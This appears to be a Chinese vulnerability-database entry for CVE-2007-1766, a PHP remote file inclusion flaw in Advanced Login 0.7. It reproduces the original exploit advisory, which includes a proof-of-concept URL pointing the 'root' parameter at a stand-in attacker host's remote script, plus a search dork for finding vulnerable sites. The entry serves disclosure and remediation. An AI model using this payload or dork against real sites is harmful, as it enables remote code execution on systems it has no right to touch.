MsxStudios Advanced Login ProfileEdit.PHP 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112570 漏洞类型 输入验证
发布时间 2007-03-29 更新时间 2007-04-02
CVE编号 CVE-2007-1766 CNNVD-ID CNNVD-200703-672
漏洞平台 PHP CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/3608
https://cxsecurity.com/issue/WLB-2007040016
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-672
|漏洞详情
AdvancedLogin0.76及之前版本的login/engine/db/profiledit.php中存在PHP远程文件包含漏洞。远程攻击者可以借助root参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
------------------------------------------------------------------------------
Advanced Login <= 0.7 (root) Remote File Inclusion Vulnerability
------------------------------------------------------------------------------

Author		: Zeni Susanto a.k.a Bithedz
Date Found	: Maret, 29th 2007
Location	: Indonesia, Bandung
Critical Lvl	: Highly critical
Impact		: System access
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~
Application	: AdvanceLogin
version		: 0.7
vendor		: http://www.msxstudios.de
source url      : http://downloads.msxstudios.de/advancedlogin076.zip

---------------------------------------------------------------------------

Description:
~~~~~~~~
Advanced Login is at present for designers the best, for programmers and successful Web masters one the best Login of systems on the market. Templates which can be edited through simply and determined Functions can adapt you to Advanced Login 100% to YOUR Design, not as differently with usual systems around. Advanced Login is developed further and improved, an installation is constantly worthwhile themselves thus, even if the present function yet for your web page are not enough completely.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~

I found vulnerability script in profiledit.php

---------- profiledit.php---------------------------------------------------------
<?php
include($root."login/engine/couple.php");
mysql_query($profil_update_sql);
$result2=mysql_query($select_new_user_sql);
$row2=mysql_fetch_assoc($result2);
?>
 
-----------------------------------------------------------------------------

Input passed to the "root" parameter in profiledit.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.



Proof Of Concept:
~~~~~~~~~~~~

http://target.com/login/engine/db/profiledit.php?root==http://attact.com/colok.txt?

-----------------------------------------------------------------------------

google d0rk:
~~~~~~~
"Advanced Login - Login"

-----------------------------------------------------------------------------
Solution:
~~~
- download new version in vendor URL 

-----------------------------------------------------------------------------
Shoutz:
~~
~ My Wife Monik 
~ K-159

-----------------------------------------------------------------------------

Contact:
~~~
 
     Bithedz[at]gmail[dot]com
     
-------------------------------- [ EOF ]----------------------------------

# milw0rm.com [2007-03-29]
|参考资料

来源:BUGTRAQ
名称:20070329AdvancedLogin<=0.7(root)RemoteFileInclusionVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/464147/100/0/threaded
来源:OSVDB
名称:34587
链接:http://osvdb.org/34587
来源:XF
名称:advanced-profiledit-file-include(33321)
链接:http://xforce.iss.net/xforce/xfdb/33321
来源:BID
名称:23197
链接:http://www.securityfocus.com/bid/23197
来源:VUPEN
名称:ADV-2007-1179
链接:http://www.frsirt.com/english/advisories/2007/1179
来源:SREASON
名称:2508
链接:http://securityreason.com/securityalert/2508
来源:SECUNIA
名称:24695
链接:http://secunia.com/advisories/24695
来源:MILW0RM
名称:3608
链接:http://milw0rm.com/exploits/3608